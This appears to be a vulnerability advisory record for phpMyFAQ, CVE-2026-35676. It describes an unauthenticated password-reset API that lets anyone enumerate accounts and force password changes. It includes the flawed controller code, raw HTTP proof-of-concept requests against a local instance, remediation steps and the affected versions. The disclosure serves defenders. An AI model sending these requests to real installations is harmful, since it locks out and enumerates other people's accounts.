GHSA-9qv9-8xv6-5p35

Source

https://github.com/advisories/GHSA-9qv9-8xv6-5p35

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-9qv9-8xv6-5p35/GHSA-9qv9-8xv6-5p35.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-9qv9-8xv6-5p35

Aliases

CVE-2026-35676

Published

2026-05-20T15:45:53Z

Modified

2026-05-28T14:30:08.278037197Z

Severity

8.2 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N CVSS Calculator

Summary

phpMyFAQ: Unauthenticated Password Reset Endpoint Allows User Enumeration and Forced Password Change Without Token Validation

Details

Summary

The password reset API can be triggered without authentication and without any out-of-band confirmation step.

If an attacker knows a valid username + email pair, they can call the reset endpoint directly. The application immediately generates a new password, writes it to the account, and only then sends the new password by email.

This creates two issues at the same time:

account enumeration through the response difference between valid and invalid pairs
forced password reset of another user's account, which invalidates the old password immediately

In my local reproduction, I confirmed both the response difference and the password change itself.

Details

The relevant code is in phpmyfaq/src/phpMyFAQ/Controller/Frontend/Api/UnauthorizedUserController.php.

The route is exposed without authentication:

#[Route(path: 'user/password/update', name: 'api.private.user.password', methods: ['PUT'])]
public function updatePassword(Request $request): JsonResponse

The flow is straightforward:

$loginExist = $user->getUserByLogin($username);

if ($loginExist && $email === $user->getUserData('email')) {
    $newPassword = $user->createPassword();
    $user->changePassword($newPassword);
    $mail->send();
    return $this->json(['success' => Translation::get(key: 'lostpwd_mail_okay')], Response::HTTP_OK);
}

return $this->json(['error' => Translation::get(key: 'lostpwd_err_1')], Response::HTTP_CONFLICT);

The core issue is that the password is changed immediately after a simple username and email match. There is no reset token, no confirmation link, no second step, and no requirement that the caller prove control of the mailbox before the password is replaced.

That means the endpoint is not just a "forgot password email sender". It is an actual unauthenticated password change trigger.

PoC

This was reproduced against a local Docker deployment of the project.

For a valid username and email pair:

PUT /api/index.php/user/password/update HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"username":"user1","email":"user1@example.com"}

Response:

HTTP/1.0 200 OK
Content-Type: application/json

{"success":"Email has been sent."}

For an invalid pair:

PUT /api/index.php/user/password/update HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"username":"user1","email":"wrong@example.com"}

Response:

HTTP/1.0 409 Conflict
Content-Type: application/json

{"error":"Error: Username and email address not found."}

That already confirms enumeration.

To verify that the password really changes, created a test account:

username: user2
password: Oldpass123!
email: user2@example.com

Before calling the endpoint, the password hash stored in faquserlogin was:

481bf096fd16e68ebbb8b98368bc0b5c17631a00f01a36dbb4a8dade0f0b8125

Then send:

PUT /api/index.php/user/password/update HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"username":"user2","email":"user2@example.com"}

The response was:

HTTP/1.0 200 OK
Content-Type: application/json

{"success":"Email has been sent."}

After that, the stored hash changed to:

3497f20c251da705f673dcac500fbf9e2e2e495719a7e2df9be08db42bf1286f

Then try to log in with the old password:

POST /authenticate HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

faqusername=user2&faqpassword=Oldpass123!

The application redirected back to the login page and reported that the password was incorrect.

So this is not just a cosmetic issue in the API response. The old credential really becomes invalid.

Impact

The most realistic impact here is forced password reset and account disruption.

An attacker who knows or can guess a valid username and email pair can:

confirm whether the pair is valid
force the target account's password to change
cause the victim's old password to stop working immediately

If the attacker does not control the victim's mailbox, this is usually a denial-of-service style account disruption rather than instant account takeover. That is the main reason I would keep the severity at Medium.

Even so, this is still a real security issue. Password recovery should not allow an unauthenticated caller to change the account password directly.

Remediation

Recommend to change the password recovery flow to a token-based design.

Do not change the password inside the unauthenticated endpoint.
Generate a short-lived, single-use reset token and send only the reset link by email.
Return the same generic response for both valid and invalid username/email pairs.
Keep rate limiting in place, but do not rely on it as the main protection.
Add regression tests that verify the password hash does not change until a valid reset token is presented.

Database specific

{
    "github_reviewed": true,
    "severity": "HIGH",
    "github_reviewed_at": "2026-05-20T15:45:53Z",
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-640"
    ]
}

References

Affected packages

Packagist / thorsten/phpmyfaq

Package

Name: thorsten/phpmyfaq
Purl: pkg:composer/thorsten%2Fphpmyfaq

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

4.1.3

Affected versions

2.*

2.8.0-alpha2

2.8.0-alpha3

2.8.0-beta

2.8.0-beta2

2.8.0-beta3

2.8.0-RC

2.8.0-RC2

2.8.0-RC3

2.8.0-RC4

2.8.0

2.8.1

2.8.2

2.8.3

2.8.4

2.8.5

2.8.6

2.8.7

2.8.8

2.8.9

2.8.10

2.8.11

2.8.12

2.8.13

2.8.14

2.8.15

2.8.16

2.8.17

2.8.18

2.8.19

2.8.20

2.8.21

2.8.22

2.8.23

2.8.24

2.8.25

2.8.26

2.8.27

2.8.28

2.8.29

2.9.0-alpha

2.9.0-alpha2

2.9.0-alpha3

2.9.0-alpha4

2.9.0-beta

2.9.0-beta2

2.9.0-rc

2.9.0-rc2

2.9.0-rc3

2.9.0-rc4

2.9.0

2.9.1

2.9.2

2.9.3

2.9.4

2.9.5

2.9.6

2.9.7

2.9.8

2.9.9

2.9.10

2.9.11

2.9.12

2.9.13

2.10.0-alpha

3.*

3.0.0-alpha

3.0.0-alpha.2

3.0.0-alpha.3

3.0.0-alpha.4

3.0.0-beta

3.0.0-beta.2

3.0.0-beta.3

3.0.0-RC

3.0.0-RC.2

3.0.0

3.0.1

3.0.2

3.0.3

3.0.4

3.0.5

3.0.6

3.0.7

3.0.8

3.0.9

3.0.10

3.0.11

3.0.12

3.1.0-alpha

3.1.0-alpha.2

3.1.0-alpha.3

3.1.0-beta

3.1.0-RC

3.1.0

3.1.1

3.1.2

3.1.3

3.1.4

3.1.5

3.1.6

3.1.7

3.1.8

3.1.9

3.1.10

3.1.11

3.1.12

3.1.13

3.1.14

3.1.15

3.1.16

3.1.17

3.1.18

3.2.0-alpha

3.2.0-beta

3.2.0-beta.2

3.2.0-RC

3.2.0-RC.2

3.2.0-RC.4

3.2.0

3.2.1

3.2.2

3.2.3

3.2.4

3.2.5

3.2.6

3.2.7

3.2.8

3.2.9

3.2.10

4.*

4.0.0-alpha

4.0.0-alpha.2

4.0.0-alpha.3

4.0.0-alpha.4

4.0.0-beta

4.0.0-beta.2

4.0.0-RC

4.0.0-RC.2

4.0.0-RC.3

4.0.0-RC.4

4.0.0-RC.5

4.0.0

4.0.1

4.0.2

4.0.3

4.0.4

4.0.5

4.0.6

4.0.7

4.0.8

4.0.9

4.0.10

4.0.11

4.0.12

4.0.13

4.0.14

4.0.15

4.0.16

4.0.18

4.0.19

4.1.0-alpha

4.1.0-alpha.2

4.1.0-alpha.3

4.1.0-beta

4.1.0-beta.2

4.1.0-RC

4.1.0-RC.2

4.1.0-RC.4

4.1.0-RC.5

4.1.0-RC.6

4.1.0-RC.7

4.1.0

4.1.1

4.1.2

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-9qv9-8xv6-5p35/GHSA-9qv9-8xv6-5p35.json"

Packagist / phpmyfaq/phpmyfaq